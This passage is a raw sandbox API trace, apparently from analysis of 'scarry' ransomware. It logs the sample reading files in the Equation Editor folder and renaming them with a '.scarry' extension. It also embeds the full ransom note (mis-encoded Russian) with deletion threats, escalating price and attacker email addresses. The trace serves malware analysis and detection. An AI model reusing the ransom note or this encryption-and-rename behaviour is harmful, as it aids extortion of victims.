lpFatTime=0x18ee84) returned 1 [0105.183] GlobalLock (hMem=0x450004) returned 0x591988 [0105.183] GlobalHandle (pMem=0x591988) returned 0x450004 [0105.183] GlobalUnlock (hMem=0x450004) returned 0 [0105.183] GlobalLock (hMem=0x450004) returned 0x591988 [0105.183] GlobalLock (hMem=0x45000c) returned 0x593998 [0105.183] GlobalHandle (pMem=0x591988) returned 0x450004 [0105.183] GlobalUnlock (hMem=0x450004) returned 0 [0105.183] GlobalHandle (pMem=0x593998) returned 0x45000c [0105.183] GlobalUnlock (hMem=0x45000c) returned 0 [0105.183] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0105.183] CharLowerBuffW (in: lpsz="EQNEDT32.EXE", cchLength=0xc | out: lpsz="eqnedt32.exe") returned 0xc [0105.183] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eí\x18", lpUsedDefaultChar=0x0) returned 1 [0105.183] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="x", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="xí\x18", lpUsedDefaultChar=0x0) returned 1 [0105.183] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eí\x18", lpUsedDefaultChar=0x0) returned 1 [0105.183] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".í\x18", lpUsedDefaultChar=0x0) returned 1 [0105.183] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="2", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="2í\x18", lpUsedDefaultChar=0x0) 
returned 1 [0105.183] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="3", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3í\x18", lpUsedDefaultChar=0x0) returned 1 [0105.183] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tí\x18", lpUsedDefaultChar=0x0) returned 1 [0105.184] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dí\x18", lpUsedDefaultChar=0x0) returned 1 [0105.184] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eí\x18", lpUsedDefaultChar=0x0) returned 1 [0105.184] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ní\x18", lpUsedDefaultChar=0x0) returned 1 [0105.184] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="qí\x18", lpUsedDefaultChar=0x0) returned 1 [0105.184] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eí\x18", lpUsedDefaultChar=0x0) returned 1 [0105.184] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac08, cbMultiByte=36, lpWideCharStr=0x18dd64, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txtXT\x18\x03") returned 36 [0105.184] 
WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE", cchWideChar=68, lpMultiByteStr=0x18dd40, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXEñ", lpUsedDefaultChar=0x0) returned 68 [0105.184] CharLowerBuffW (in: lpsz=".EXE", cchLength=0x4 | out: lpsz=".exe") returned 0x4 [0105.184] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".exe", cchWideChar=4, lpMultiByteStr=0x18dd64, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".exeShared\\EQUATION\\EQNEDT32.EXEñ", lpUsedDefaultChar=0x0) returned 4 [0105.184] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3acd3b00, ftCreationTime.dwHighDateTime=0x1c6cca0, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x3acd3b00, ftLastWriteTime.dwHighDateTime=0x1c6cca0, nFileSizeHigh=0x0, nFileSizeLow=0x236, dwReserved0=0x0, dwReserved1=0x0, cFileName="eqnedt32.exe.manifest", cAlternateFileName="EQNEDT~1.MAN")) returned 1 [0105.184] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0105.184] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0105.184] GlobalLock (hMem=0x45000c) returned 0x591988 [0105.184] GlobalHandle (pMem=0x591988) returned 0x45000c [0105.185] GlobalUnlock (hMem=0x45000c) returned 0 [0105.185] GlobalLock (hMem=0x45000c) returned 0x591988 [0105.185] GlobalLock (hMem=0x450004) returned 0x593998 [0105.185] GlobalHandle (pMem=0x591988) returned 0x45000c [0105.185] GlobalUnlock (hMem=0x45000c) returned 0 [0105.185] GlobalHandle (pMem=0x593998) 
returned 0x450004 [0105.185] GlobalUnlock (hMem=0x450004) returned 0 [0105.185] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0105.185] CharLowerBuffW (in: lpsz="eqnedt32.exe.manifest", cchLength=0x15 | out: lpsz="eqnedt32.exe.manifest") returned 0x15 [0105.185] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tí\x18", lpUsedDefaultChar=0x0) returned 1 [0105.185] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sí\x18", lpUsedDefaultChar=0x0) returned 1 [0105.185] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eí\x18", lpUsedDefaultChar=0x0) returned 1 [0105.185] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fí\x18", lpUsedDefaultChar=0x0) returned 1 [0105.185] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ií\x18", lpUsedDefaultChar=0x0) returned 1 [0105.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ní\x18", lpUsedDefaultChar=0x0) returned 1 [0105.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, 
lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aí\x18", lpUsedDefaultChar=0x0) returned 1 [0105.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mí\x18", lpUsedDefaultChar=0x0) returned 1 [0105.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".í\x18", lpUsedDefaultChar=0x0) returned 1 [0105.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eí\x18", lpUsedDefaultChar=0x0) returned 1 [0105.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="x", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="xí\x18", lpUsedDefaultChar=0x0) returned 1 [0105.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eí\x18", lpUsedDefaultChar=0x0) returned 1 [0105.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".í\x18", lpUsedDefaultChar=0x0) returned 1 [0105.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="2", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="2í\x18", lpUsedDefaultChar=0x0) returned 1 [0105.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="3", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, 
lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3í\x18", lpUsedDefaultChar=0x0) returned 1 [0105.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tí\x18", lpUsedDefaultChar=0x0) returned 1 [0105.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dí\x18", lpUsedDefaultChar=0x0) returned 1 [0105.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eí\x18", lpUsedDefaultChar=0x0) returned 1 [0105.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ní\x18", lpUsedDefaultChar=0x0) returned 1 [0105.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="qí\x18", lpUsedDefaultChar=0x0) returned 1 [0105.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eí\x18", lpUsedDefaultChar=0x0) returned 1 [0105.186] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac78, cbMultiByte=36, lpWideCharStr=0x18dd64, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txtXT\x18\x03") returned 36 [0105.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", cchWideChar=77, 
lpMultiByteStr=0x18dd40, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", lpUsedDefaultChar=0x0) returned 77 [0105.186] CharLowerBuffW (in: lpsz=".manifest", cchLength=0x9 | out: lpsz=".manifest") returned 0x9 [0105.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".manifest", cchWideChar=9, lpMultiByteStr=0x18dd64, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".manifestd\\EQUATION\\eqnedt32.exe.manifest", lpUsedDefaultChar=0x0) returned 9 [0105.187] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", lpFindFileData=0x18eb04 | out: lpFindFileData=0x18eb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3acd3b00, ftCreationTime.dwHighDateTime=0x1c6cca0, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x3acd3b00, ftLastWriteTime.dwHighDateTime=0x1c6cca0, nFileSizeHigh=0x0, nFileSizeLow=0x236, dwReserved0=0x0, dwReserved1=0x0, cFileName="eqnedt32.exe.manifest", cAlternateFileName="EQNEDT~1.MAN")) returned 0x58b060 [0105.187] FileTimeToLocalFileTime (in: lpFileTime=0x18eb18, lpLocalFileTime=0x18ea30 | out: lpLocalFileTime=0x18ea30) returned 1 [0105.187] FileTimeToDosDateTime (in: lpFileTime=0x18ea30, lpFatDate=0x18eae6, lpFatTime=0x18eae4 | out: lpFatDate=0x18eae6, lpFatTime=0x18eae4) returned 1 [0105.187] FindClose (in: hFindFile=0x58b060 | out: hFindFile=0x58b060) returned 1 [0105.187] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", dwFileAttributes=0x20) returned 1 [0105.292] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0105.293] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea10*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x18ea10*=0) returned 0x0 [0105.293] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea10*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x18ea10*=0) returned 0x236 [0105.293] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea10*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18ea10*=0) returned 0x0 [0105.293] ReadFile (in: hFile=0x1a4, lpBuffer=0x1e79f28, nNumberOfBytesToRead=0x236, lpNumberOfBytesRead=0x18ea34, lpOverlapped=0x0 | out: lpBuffer=0x1e79f28*, lpNumberOfBytesRead=0x18ea34*=0x236, lpOverlapped=0x0) returned 1 [0105.294] GlobalLock (hMem=0x450004) returned 0x591988 [0105.294] GlobalLock (hMem=0x45000c) returned 0x593998 [0105.294] GlobalHandle (pMem=0x591988) returned 0x450004 [0105.294] GlobalUnlock (hMem=0x450004) returned 0 [0105.294] GlobalHandle (pMem=0x593998) returned 0x45000c [0105.294] GlobalUnlock (hMem=0x45000c) returned 0 [0105.294] GlobalLock (hMem=0x45000c) returned 0x591988 [0105.294] GlobalHandle (pMem=0x591988) returned 0x45000c [0105.294] GlobalUnlock (hMem=0x45000c) returned 0 [0108.369] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1da7e48, cbMultiByte=63, lpWideCharStr=0x18da40, cchWideChar=2047 | out: lpWideCharStr="Cr5RDwmwHs8MynVqdU5DcZE45mqoEc8m6vr8ArB=GSpuRTe9BYpCgPmO.scarry") returned 63 [0108.369] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft 
Shared\\EQUATION\\Cr5RDwmwHs8MynVqdU5DcZE45mqoEc8m6vr8ArB=GSpuRTe9BYpCgPmO.scarry" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\cr5rdwmwhs8mynvqdu5dcze45mqoec8m6vr8arb=gspurte9bypcgpmo.scarry")) returned 1 [0108.370] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\Cr5RDwmwHs8MynVqdU5DcZE45mqoEc8m6vr8ArB=GSpuRTe9BYpCgPmO.scarry" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\cr5rdwmwhs8mynvqdu5dcze45mqoec8m6vr8arb=gspurte9bypcgpmo.scarry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0108.371] SetFileTime (hFile=0x1a4, lpCreationTime=0x18ead0, lpLastAccessTime=0x18eac8, lpLastWriteTime=0x18eac0) returned 1 [0108.371] CloseHandle (hObject=0x1a4) returned 1 [0108.371] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\Cr5RDwmwHs8MynVqdU5DcZE45mqoEc8m6vr8ArB=GSpuRTe9BYpCgPmO.scarry", dwFileAttributes=0x20) returned 1 [0108.371] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ab98, cbMultiByte=36, lpWideCharStr=0x18dd68, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT\x18\x03") returned 36 [0108.372] GlobalLock (hMem=0x45000c) returned 0x591988 [0108.372] GlobalHandle (pMem=0x591988) returned 0x45000c [0108.372] GlobalUnlock (hMem=0x45000c) returned 0 [0108.372] GlobalLock (hMem=0x45000c) returned 0x591988 [0108.372] GlobalLock (hMem=0x450004) returned 0x593998 [0108.372] GlobalHandle (pMem=0x591988) returned 0x45000c [0108.372] GlobalUnlock (hMem=0x45000c) returned 0 [0108.372] GlobalHandle (pMem=0x593998) returned 0x450004 [0108.372] GlobalUnlock (hMem=0x450004) returned 0 [0108.372] CompareStringA (Locale=0x400, dwCmpFlags=0x0, lpString1="{{IDENTIFIER}}\r\n\r\nÂàøè äîêóìåíòû, ôîòîãðàôèè, áàçû äàííûõ è äðóãèå âàæíûå ôàéëû áûëè çàøèôðîâàíû. 
\r\nÊàæäûå 24 ÷àñà óäàëÿþòñÿ 24 ôàéëà, íåîáõîäèìî ïðèñëàòü ñâîé èäåíòèôèêàòîð ÷òîá ìû îòêëþ÷èëè ýòó ôóíêöèþ.\r\nÊàæäûå 24 ÷àñà ñòîèìîñòü ðàñøèôðîâêè äàííûõ óâåëè÷èâàåòñÿ íà 30% (÷åðåç 72 ÷àñà ñóììà ôèêñèðóåòñÿ)\r\n\r\nÄëÿ ðàñøèôðîâêè äàííûõ:\r\n\r\nÍàïèøèòå íà ïî÷òó - scarry38@horsefucker.org\r\n \r\n * ïèñüìå óêàçàòü Âàø ëè÷íûé èäåíòèôèêàòîð\r\n *Ïðèêðåïèòå 2 ôàéëà äî 1 ìá äëÿ òåñòîâîé ðàñøèôðîâêè. \r\n ìû èõ ðàñøèôðóåì, â êà÷åñòâå äîêàçàòåëüñòâà, ÷òî ÒÎËÜÊÎ ÌÛ ìîæåì ðàñøèôðîâàòü ôàéëû.\r\n\r\nÂÀÆÍÎ! Íå ïèøèòå ñ mail.ru (ê íàì íå äîõîäÿò ïèüñìà) Èñïîëüçóéòå - yandex.ru gmail.com è ò.ä. \r\nÂñå êðîìå mail.ru\r\n\r\n -×åì áûñòðåå âû ñîîáùèòå íàì ñâîé èäåíòèôèêàòîð, òåì áûñòðåå ìû âûêëþ÷èì ïðîèçâîëüíîå óäàëåíèå ôàéëîâ.\r\n -Íàïèñàâ íàì íà ïî÷òó âû ïîëó÷èòå äàëüíåéøèå èíñòðóêöèè ïî îïëàòå.\r\n\r\n îòâåòíîì ïèñüìå Âû ïîëó÷èòå ïðîãðàììó äëÿ ðàñøèôðîâêè.\r\nÏîñëå çàïóñêà ïðîãðàììû-äåøèôðîâùèêà âñå Âàøè ôàéëû áóäóò âîññòàíîâëåíû.\r\n\r\nÌû ãàðàíòèðóåì:\r\n100% óñïåøíîå âîññòàíîâëåíèå âñåõ âàøèõ ôàéëîâ\r\n100% ãàðàíòèþ ñîîòâåòñòâèÿ\r\n100% áåçîïàñíûé è íàäåæíûé ñåðâèñ\r\n\r\nÂíèìàíèå!\r\n * Íå ïûòàéòåñü óäàëèòü ïðîãðàììó èëè çàïóñêàòü àíòèâèðóñíûå ñðåäñòâà\r\n * Ïîïûòêè ñàìîñòîÿòåëüíîé ðàñøèôðîâêè ôàéëîâ ïðèâåäóò ê ïîòåðå Âàøèõ äàííûõ\r\n * Äåøèôðàòîðû äðóãèõ ïîëüçîâàòåëåé íåñîâìåñòèìû ñ Âàøèìè äàííûìè, òàê êàê ó êàæäîãî ïîëüçîâàòåëÿ\r\nóíèêàëüíûé êëþ÷ øèôðîâàíèÿ\r\n\r\n Åñëè âàì íå îòâåòèëè â òå÷åíèè 24õ ÷àñîâ, ïèøèòå íà ðåçåðâíóþ ïî÷òó - black8201@protonmail.com\r\n====================================================================================================\r\n\r\nÂàø ëè÷íûé èäåíòèôèêàòîð\r\n\r\n{{IDENTIFIER}}", cchCount1=14, lpString2="{{IDENTIFIER}}", cchCount2=14) returned 2 [0108.372] CompareStringA (Locale=0x400, dwCmpFlags=0x0, lpString1="{{IDENTIFIER}}", cchCount1=14, lpString2="{{IDENTIFIER}}", cchCount2=14) returned 2 [0108.372] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\Èíñòðóêöèÿ ïî ðàñøèôðîâêå 
ôàéëîâ.TXT", lpFindFileData=0x18eb1c | out: lpFindFileData=0x18eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd8d32a0, ftCreationTime.dwHighDateTime=0x1d61645, ftLastAccessTime.dwLowDateTime=0xfd8d32a0, ftLastAccessTime.dwHighDateTime=0x1d61645, ftLastWriteTime.dwLowDateTime=0xfd8d32a0, ftLastWriteTime.dwHighDateTime=0x1d61645, nFileSizeHigh=0x0, nFileSizeLow=0xdf9, dwReserved0=0xc00008c8, dwReserved1=0x7ff, cFileName="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT", cAlternateFileName="D407~1.TXT")) returned 0x58b060 [0108.372] FileTimeToLocalFileTime (in: lpFileTime=0x18eb30, lpLocalFileTime=0x18eab0 | out: lpLocalFileTime=0x18eab0) returned 1 [0108.372] FileTimeToDosDateTime (in: lpFileTime=0x18eab0, lpFatDate=0x18eafe, lpFatTime=0x18eafc | out: lpFatDate=0x18eafe, lpFatTime=0x18eafc) returned 1 [0108.372] FindClose (in: hFindFile=0x58b060 | out: hFindFile=0x58b060) returned 1 [0108.373] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0108.373] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0x0 [0108.373] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0xdf9 [0108.373] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0x0 [0108.373] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0x0 [0108.373] 
SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0xdf9 [0108.373] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0x0 [0108.373] ReadFile (in: hFile=0x1a4, lpBuffer=0x1e7ad38, nNumberOfBytesToRead=0xdf9, lpNumberOfBytesRead=0x18ed28, lpOverlapped=0x0 | out: lpBuffer=0x1e7ad38*, lpNumberOfBytesRead=0x18ed28*=0xdf9, lpOverlapped=0x0) returned 1 [0108.373] CloseHandle (hObject=0x1a4) returned 1 [0108.374] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bd0200, ftCreationTime.dwHighDateTime=0x1be1298, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x3bd0200, ftLastWriteTime.dwHighDateTime=0x1be1298, nFileSizeHigh=0x0, nFileSizeLow=0x2b0b7, dwReserved0=0x0, dwReserved1=0x0, cFileName="EQNEDT32.HLP", cAlternateFileName="")) returned 1 [0108.374] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0108.374] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0108.374] GlobalLock 